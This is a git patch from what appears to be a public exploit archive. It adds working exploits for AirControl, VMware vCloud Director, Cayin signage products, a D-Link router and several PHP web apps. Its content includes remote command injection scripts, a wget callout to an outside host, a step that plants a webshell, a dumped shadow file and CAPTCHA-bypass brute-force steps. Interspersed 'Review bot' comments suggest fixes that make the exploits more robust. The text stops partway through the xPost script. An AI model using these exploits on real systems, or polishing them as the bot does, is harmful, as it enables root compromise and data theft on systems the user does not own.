From 533f33f3f4702cb4372efaaba23e3c87dd246c81 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 5 Jun 2020 05:01:53 +0000 Subject: [PATCH] DB: 2020-06-05 17 changes to exploits/shellcodes IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path AirControl 1.4.2 - PreAuth Remote Code Execution Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated) Clinic Management System 1.0 - Unauthenticated Remote Code Execution Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated) Oriol Espinal CMS 1.0 - 'id' SQL Injection Clinic Management System 1.0 - Authenticated Arbitrary File Upload Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin) VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution Navigate CMS 2.8.7 - Authenticated Directory Traversal D-Link DIR-615 T1 20.10 - CAPTCHA Bypass Online Marriage Registration System 1.0 - Remote Code Execution Cayin Content Management Server 11.0 - Remote Command Injection (root) SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read Cayin Signage Media Player 3.0 - Remote Command Injection (root) Cayin Digital Signage System xPost 2.5 - Remote Command Injection --- exploits/hardware/webapps/48541.py | 30 ++++++ exploits/hardware/webapps/48551.txt | 28 ++++++ exploits/hardware/webapps/48554.txt | 72 ++++++++++++++ exploits/hardware/webapps/48556.txt | 95 +++++++++++++++++++ exploits/java/webapps/48549.py | 138 +++++++++++++++++++++++++++ exploits/multiple/webapps/48553.txt | 139 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48557.py | 130 ++++++++++++++++++++++++++ exploits/multiple/webapps/48558.txt | 121 ++++++++++++++++++++++++ exploits/php/webapps/48542.txt | 20 ++++ exploits/php/webapps/48544.txt | 62 +++++++++++++ exploits/php/webapps/48545.py | 34 +++++++ exploits/php/webapps/48546.txt | 76 +++++++++++++++ exploits/php/webapps/48547.txt | 62 +++++++++++++ exploits/php/webapps/48548.txt | 99 ++++++++++++++++++++ 
exploits/php/webapps/48550.txt | 29 ++++++ exploits/php/webapps/48552.sh | 52 +++++++++++ exploits/windows/local/48543.txt | 53 +++++++++++ files_exploits.csv | 17 ++++ 18 files changed, 1257 insertions(+) create mode 100755 exploits/hardware/webapps/48541.py create mode 100644 exploits/hardware/webapps/48551.txt create mode 100644 exploits/hardware/webapps/48554.txt create mode 100644 exploits/hardware/webapps/48556.txt create mode 100755 exploits/java/webapps/48549.py create mode 100644 exploits/multiple/webapps/48553.txt create mode 100755 exploits/multiple/webapps/48557.py create mode 100644 exploits/multiple/webapps/48558.txt create mode 100644 exploits/php/webapps/48542.txt create mode 100644 exploits/php/webapps/48544.txt create mode 100755 exploits/php/webapps/48545.py create mode 100644 exploits/php/webapps/48546.txt create mode 100644 exploits/php/webapps/48547.txt create mode 100644 exploits/php/webapps/48548.txt create mode 100644 exploits/php/webapps/48550.txt create mode 100755 exploits/php/webapps/48552.sh create mode 100644 exploits/windows/local/48543.txt diff --git a/exploits/hardware/webapps/48541.py b/exploits/hardware/webapps/48541.py new file mode 100755 index 000000000..ccd4be227 --- /dev/null +++ b/exploits/hardware/webapps/48541.py 
@@ -0,0 +1,30 @@ +# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution +# Date: 2020-06-03 +# Exploit Author: 0xd0ff9 vs j3ssie +# Vendor Homepage: https://www.ui.com/ +# Software Link: https://www.ui.com/download/#!utilities +# Version: AirControl <= 1.4.2 +# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml + +import requests +import re +import urllib +import sys + + +print """USAGE: python exploit_aircontrol.py [url] [cmd]""" + + +url = sys.argv[1] +cmd = sys.argv[2] + + +burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}" +burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"} +r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False) + +Locat = r.headers["Location"] + +res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1) + +print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res) \ No newline at end of file diff --git a/exploits/hardware/webapps/48551.txt b/exploits/hardware/webapps/48551.txt new file mode 100644 index 000000000..18c04755b --- /dev/null +++ b/exploits/hardware/webapps/48551.txt 
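Review bot: `Locat = r.headers["Location"]` and the following `re.search(...).group(1)` both assume the target answered with the expected redirect, so an unreachable or patched host ends in a KeyError or AttributeError instead of a readable message. Replace them with `loc = r.headers.get("Location", "")`, `m = re.search("pwned=(.*)(&cid=.*)", loc)` and `if m is None: sys.exit("[!] no pwned= in Location header; target not vulnerable?")`, then print `m.group(1)`. The command is also spliced raw into both the EL expression and the query string, so any `cmd` containing `&`, `#` or `%` corrupts the URL and a single quote breaks the EL literal; passing `urllib.quote(cmd, safe="")` into the URL fixes the former, the latter still has to be avoided by the operator. The script uses Python 2 `print` statements, which the USAGE line could state.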
@@ -0,0 +1,28 @@ +# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass +# Date: 2019-10-12 +# Exploit Author: huzaifa hussain +# Vendor Homepage: https://in.dlink.com/ +# Version: DIR-615 T1 ver:20.10 +# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 +# CVE: CVE-2019-17525 + +D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1 + +A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING. + +------------------------------------ +D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new. + +ATTACK SCENARIO AND REPRODUCTION STEPS + +1: Find the ROUTER LoginPage. +2: Fill the required login credentials. +3: Fill the CAPTCH properly and Intercept the request in Burpsuit. +4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab +5: Set the payloads on target variables i.e. username & password under Payloads Tab. +5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab. +6: Now hit the start attack and you will find the correct credentials. + +------------------------------------- + +Huzaifa Hussain \ No newline at end of file diff --git a/exploits/hardware/webapps/48554.txt b/exploits/hardware/webapps/48554.txt new file mode 100644 index 000000000..80412aae7 --- /dev/null +++ b/exploits/hardware/webapps/48554.txt 
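Review bot: The reproduction steps never say which request fields must stay fixed for the reuse to work, even though that is the whole finding ("reuse the same captcha without reloading new"). Step 4 should state that only username and password are marked as Intruder positions while the solved CAPTCHA value and the cookies captured in step 3 are left untouched in every request, e.g. `4: Mark only username and password as positions; leave the solved CAPTCHA value and the cookies exactly as captured.` Two consecutive steps are numbered `5:` and the `"HARDWARE VERSION:T1` quote on the Tested-on line is unclosed. A one-line remediation (bind each CAPTCHA to a server-side nonce that is invalidated after a single check) would help readers arriving via the CVE.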
@@ -0,0 +1,72 @@ +# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) +# Author: LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5567 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php + + +14.05.2020 + +-- + + +CSRF Add Super User: +-------------------- + + + +
+ + + + + + + + + + + + + + +
+ + + +Result /etc/shadow: + +root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh +sshd:!!:100:65534::/home:/bin/false +clamav:!!:103:65534::/home:/bin/false +testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh \ No newline at end of file diff --git a/exploits/hardware/webapps/48556.txt b/exploits/hardware/webapps/48556.txt new file mode 100644 index 000000000..241b68a4f --- /dev/null +++ b/exploits/hardware/webapps/48556.txt @@ -0,0 +1,95 @@ +# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: http://www.securecomputing.com +# CVE: N/A + +Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write + + +Vendor: Secure Computing Corp. +Product web page: http://www.securecomputing.com +Affected version: 3.1.5u1 + +Summary: The SG gateway appliance range provides Internet security and +privacy of communications for small and medium enterprises, and branch +offices. It simply and securely connects your office to the Internet, +and with its robust stateful firewall, shields your computers from +external threats. + +Desc: The application allows the currently logged-in user to edit the +configuration files in the system using the CGI executable 'edit_config_files' +in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) +are located in the /etc/config/ directory. An attacker can manipulate +the POST request parameters to escape from the restricted environment +by using absolute path and start reading, writing and deleting arbitrary +files on the system. + +Tested on: fnord/1.9 + Apache 1.3.27 (Unix) + Linux 2.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5568 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php + + +14.05.2020 + +-- + + +Read: +----- + + +
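Review bot: The Desc paragraph never names the CGI endpoint or the form fields the CSRF page submits, and the PoC markup itself does not survive in this rendering, so a reader cannot tell which request to reproduce or what to protect. A sentence such as `The PoC is a cross-origin POST to /cgi-bin/cgix/<endpoint> carrying the user-creation fields shown below; no anti-CSRF token or Origin/Referer check is applied.` (with the real path and field names) would make the finding reproducible from the prose alone. The header says `3.1.5` while the body says `Affected version: 3.1.5u1`; pick one. The `/etc/shadow` dump shows the added `testingus` account, which is enough to support the title; printing the root hash next to it is not needed for the demonstration.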
+ + + + + + +
+ + + + +Write/overwrite/move: +--------------------- + + +
+ + + + + + + + + + +
+ + + + +Delete: +------- + + +
+ + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/java/webapps/48549.py b/exploits/java/webapps/48549.py
new file mode 100755
index 000000000..2adda7607
--- /dev/null
+++ b/exploits/java/webapps/48549.py
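Review bot: The header line says `Arbitrary File Read`, but the body is titled `Arbitrary File Read/Write` and the Desc describes reading, writing, moving and deleting arbitrary files, so the title and the CSV entry undersell the impact. The Desc also states the CGI serves "the currently logged-in user", so `Authenticated` belongs in the title as well, e.g. `# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Authenticated Arbitrary File Read/Write/Delete`. The three PoC sections (Read, Write/overwrite/move, Delete) carry no visible request bodies in this rendering; naming in the Desc the POST parameter of `edit_config_files` that accepts the absolute path would keep the finding reproducible even without the markup.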
@@ -0,0 +1,138 @@ +# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +#!/usr/bin/python + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] 
can\'t find tenant identifier') + return + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return + else: + print('[!] url for login form was not found') + return + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] 
orgId not found') + return + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, args.u, args.p, args.c, args.v) \ No newline at end 
of file
diff --git a/exploits/multiple/webapps/48553.txt b/exploits/multiple/webapps/48553.txt
new file mode 100644
index 000000000..adbf9fa72
--- /dev/null
+++ b/exploits/multiple/webapps/48553.txt
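Review bot: `login()` returns `None` on every failure path (unknown tenant, bad credentials, missing login form, organization or orgId not found) but `exploit()` unpacks its result unconditionally, so each of those cases ends in `TypeError: cannot unpack non-iterable NoneType` right after the diagnostic was printed. Change the first line of `exploit()` to `creds = login(url, username, password, verbose)`, `if creds is None: sys.exit(1)` and `(jwt, session_id, organization, org_id) = creds`. The `sys.version_info` shim only fixes `urlparse`: under Python 3 every `re.search(r'...', res.content)` fails because `res.content` is bytes, and `base64.b64encode('%s@%s:%s' % ...)` needs bytes too, so either use `res.text` / `.encode()` throughout or drop the shim and state that the script is Python 2. The `#!/usr/bin/python` line sits after the comment header and is therefore not a shebang; move it to line 1. The XML body of the email-settings PUT appears to have lost its element tags in this rendering, so that request cannot be checked here.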
@@ -0,0 +1,139 @@ +# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A +Cayin Content Management Server 11.0 Root Remote Command Injection + + +Vendor: CAYIN Technology Co., Ltd. +Product web page: https://www.cayintech.com +Affected version: CMS-SE v11.0 Build 19179 + CMS-SE v11.0 Build 19025 + CMS-SE v11.0 Build 18325 + CMS Station (CMS-SE-LXC) + CMS-60 v11.0 Build 19025 + CMS-40 v9.0 Build 14197 + CMS-40 v9.0 Build 14099 + CMS-40 v9.0 Build 14093 + CMS-20 v9.0 Build 14197 + CMS-20 v9.0 Build 14092 + CMS v8.2 Build 12199 + CMS v8.0 Build 11175 + CMS v7.5 Build 11175 + +Summary: CAYIN Technology provides Digital Signage +solutions, including media players, servers, and +software designed for the DOOH (Digital Out-of-home) +networks. We develop industrial-grade digital signage +appliances and tailored services so you don't have +to do the hard work. + +Desc: CAYIN CMS suffers from an authenticated OS +semi-blind command injection vulnerability using +default credentials. This can be exploited to inject +and execute arbitrary shell commands as the root +user through the 'NTP_Server_IP' HTTP POST parameter +in system.cgi page. + +Tested on: Apache/1.3.42 (Unix) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5570 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php + + +15.05.2020 + +--- + + +Session created with default credentials (webadmin:bctvadmin). 
+ +HTTP POST Request: +----------------- + +POST /cgi-bin/system.cgi HTTP/1.1 +Host: 192.168.1.3 +Content-Length: 201 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Smith +Origin: http://192.168.1.3 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.3/cgi-bin/system.cgi +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 +Connection: close + + +save_system: 1 +system_date: 2020/5/16 06:36:48 +TIMEZONE: 49 +NTP_Service: 1 +NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) +TEST_NTP: 測試 +reboot1: 1 +reboot_sel1: 4 +reboot_sel2: 1 +reboot_sel3: 1 +font_list: ZH_TW + + +Request recorder @ ZSL: +----------------------- + +Origin of HTTP request: 192.168.1.3:61347 +HTTP GET request to vrfy.zeroscience.mk: + +GET / HTTP/1.0 +User-Agent: MyVoiceIsMyPassportVerifyMe +Host: vrfy.zeroscience.mk +Accept: */* +Connection: Keep-Alive + + +PoC script: +----------- + +import requests + +url = "http://192.168.1.3:80/cgi-bin/system.cgi" + +cookies = {"cy_lang": "ZH_TW", + "cy_us": "67176fd7d3d05812008", + "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", + "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", + "WEB_STR_SYSTEM": "SYSTEM_SETTING", + "cy_cgi_tp": "1591206269_15957"} + +headers = {"Cache-Control": "max-age=0", + "Origin": "http://192.168.1.3", + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Smith", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": "http://192.168.1.3/cgi-bin/system.cgi", + "Accept-Encoding": "gzip, deflate", + 
"Accept-Language": "en-US,en;q=0.9", + "Connection": "close"} + +data = {"save_system": "1", + "system_date": "2020/5/16 06:36:48", + "TIMEZONE": "49", + "NTP_Service": "1", + "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& + "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", + "reboot1": "1", + "reboot_sel1": "4", + "reboot_sel2": "1", + "reboot_sel3": "1", + "font_list": "ZH_TW"} + +requests.post(url, headers=headers, cookies=cookies, data=data) \ No newline at end of file diff --git a/exploits/multiple/webapps/48557.py b/exploits/multiple/webapps/48557.py new file mode 100755 index 000000000..31b0ff35a --- /dev/null +++ b/exploits/multiple/webapps/48557.py 
@@ -0,0 +1,130 @@ +# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root) +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Signage Media Player 3.0 Root Remote Command Injection +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: SMP-8000QD v3.0 +# SMP-8000 v3.0 +# SMP-6000 v3.0 Build 19025 +# SMP-6000 v1.0 Build 14246 +# SMP-6000 v1.0 Build 14199 +# SMP-6000 v1.0 Build 14167 +# SMP-6000 v1.0 Build 14097 +# SMP-6000 v1.0 Build 14090 +# SMP-6000 v1.0 Build 14069 +# SMP-6000 v1.0 Build 14062 +# SMP-4000 v1.0 Build 14098 +# SMP-4000 v1.0 Build 14092 +# SMP-4000 v1.0 Build 14087 +# SMP-2310 v3.0 +# SMP-2300 v3.0 Build 19316 +# SMP-2210 v3.0 Build 19025 +# SMP-2200 v3.0 Build 19029 +# SMP-2200 v3.0 Build 19025 +# SMP-2100 v10.0 Build 16228 +# SMP-2100 v3.0 +# SMP-2000 v1.0 Build 14167 +# SMP-2000 v1.0 Build 14087 +# SMP-1000 v1.0 Build 14099 +# SMP-PROPLUS v1.5 Build 10081 +# SMP-WEBPLUS v6.5 Build 11126 +# SMP-WEB4 v2.0 Build 13073 +# SMP-WEB4 v2.0 Build 11175 +# SMP-WEB4 v1.5 Build 11476 +# SMP-WEB4 v1.5 Build 11126 +# SMP-WEB4 v1.0 Build 10301 +# SMP-300 v1.0 Build 14177 +# SMP-200 v1.0 Build 13080 +# SMP-200 v1.0 Build 12331 +# SMP-PRO4 v1.0 +# SMP-NEO2 v1.0 +# SMP-NEO v1.0 +# +# Summary: CAYIN Technology provides Digital Signage +# solutions, including media players, servers, and +# software designed for the DOOH (Digital Out-of-home) +# networks. We develop industrial-grade digital signage +# appliances and tailored services so you don't have +# to do the hard work. +# +# Desc: CAYIN SMP-xxxx suffers from an authenticated +# OS command injection vulnerability using default +# credentials. This can be exploited to inject and +# execute arbitrary shell commands as the root user +# through the 'NTP_Server_IP' HTTP GET parameter in +# system.cgi and wizard_system.cgi pages. 
+# +# ----------------------------------------------------- +# $ ./cayin.py 192.168.1.2 id +# uid=0(root) gid=65534(guest) +# # start sshd +# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd +# $ +# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'" +# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN +# tcp 0 0 :::22 :::* LISTEN +# $ ./cayin.py 192.168.1.2 "cat /etc/passwd" +# root:x:0:0:root:/root:/bin/bash +# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin +# sshd:x:1000:0::/dev/null:/sbin/nologin +# $ +# ----------------------------------------------------- +# +# Tested on: CAYIN Technology KT-Linux v0.99 +# Apache/1.3.42 (Unix) +# Apache/1.3.41 (Unix) +# PHP/5.2.5 +# Linux 2.6.37 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5569 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php +# +# +# 15.05.2020 +# + +import requests +import sys#____ +import re#_____ + +if len(sys.argv) < 3: + print("Cayin SMP WebManager Post-Auth RCE") + print("Usage: ./cayin.py [ip] [cmd]") + sys.exit(17) +else: + ip____address = sys.argv[1] + ex____command = sys.argv[2] + +ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f" +ur____identif += (bytes(ip____address, "utf-8")) +ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69" +ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72" +ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65" +ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54" +ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50" +ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f" +ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f" +ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c" +ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72" +ur____identif += b"\x67\x25\x32\x36" ##########" +ur____identif += (bytes(ex____command, "utf-8")) +ur____identif += b"\x25\x32\x36" ##############" + +ht____request = requests.get(ur____identif, auth = ("webadmin", "admin")) 
+re____outputs = re.search("\n(.*)", ht____request.text, flags = re.S).group().strip("\n")
+print(re____outputs)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48558.txt b/exploits/multiple/webapps/48558.txt
new file mode 100644
index 000000000..0e79390d1
--- /dev/null
+++ b/exploits/multiple/webapps/48558.txt
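Review bot: `ex____command` is appended to the query string unencoded, so a command containing `&`, `#`, `%` or `+` is split, truncated or decoded into a space by the CGI before it reaches the shell, and the byte-escaped `ur____identif` literal hides that the request is simply `GET /cgi-bin/wizard_system.cgi?TEST_NTP=1&NTP_Server_IP=pool.ntp.org%26<cmd>%26`. Build it readably and encode the command: `from urllib.parse import quote` and `url = "http://%s/cgi-bin/wizard_system.cgi?TEST_NTP=1&NTP_Server_IP=pool.ntp.org%%26%s%%26" % (ip____address, quote(ex____command, safe=""))`. `re.search("\n(.*)", ...).group()` raises AttributeError when the response has no newline (wrong credentials, different firmware), so guard the match and print the status code instead. The header lists both `system.cgi` and `wizard_system.cgi` as injection points but the script only exercises the latter, which is worth a comment.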
@@ -0,0 +1,121 @@ +# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection +# Author:LiquidWorm +# Date: 2020-06-04 +# Vendor: https://www.cayintech.com +# CVE: N/A + +#!/usr/bin/env python3 +# +# +# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution +# +# +# Vendor: CAYIN Technology Co., Ltd. +# Product web page: https://www.cayintech.com +# Affected version: 2.5.18103 +# 2.0 +# 1.0 +# +# Summary: CAYIN xPost is the web-based application software, which offers a +# combination of essential tools to create rich contents for digital signage in +# different vertical markets. It provides an easy-to-use platform for instant +# data entry and further extends the usage of CAYIN SMP players to meet users' +# requirements of frequent, daily maintenance. +# +# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. +# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp +# is not properly sanitised before being returned to the user or used in SQL queries. +# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code +# and execute SYSTEM commands. +# +# -------------------------------------------------------------------------------- +# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888 +# # Injecting... +# # Executing... 
+# +# Command: whoami +# +# nt authority\system +# +# +# You have a webshell @ http://192.168.2.1:8888/thricer.jsp +# lqwrm@zslab:~$ +# -------------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 10 Home +# Microsoft Windows 8.1 +# Microsoft Windows Server 2016 +# Microsoft Windows Server 2012 +# Microsoft Windows 7 Ultimate SP1 +# Apache Tomcat/9.0.1 +# MySQL/5.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5571 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php +# +# +# 15.05.2020 +# + +import requests as req +import time as vremeto +import sys as sistemot +import re as regularno + +if len(sistemot.argv) < 2: + print("Cayin xPost 2.5 Pre-Auth SQLi RCE") + print("Usage: ./wayfinder.py ip:port") + sistemot.exit(19) +else: + ip = sistemot.argv[1] + +filename = "thricer.jsp" +urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=" +constr = "-251' UNION ALL SELECT " + +print("# 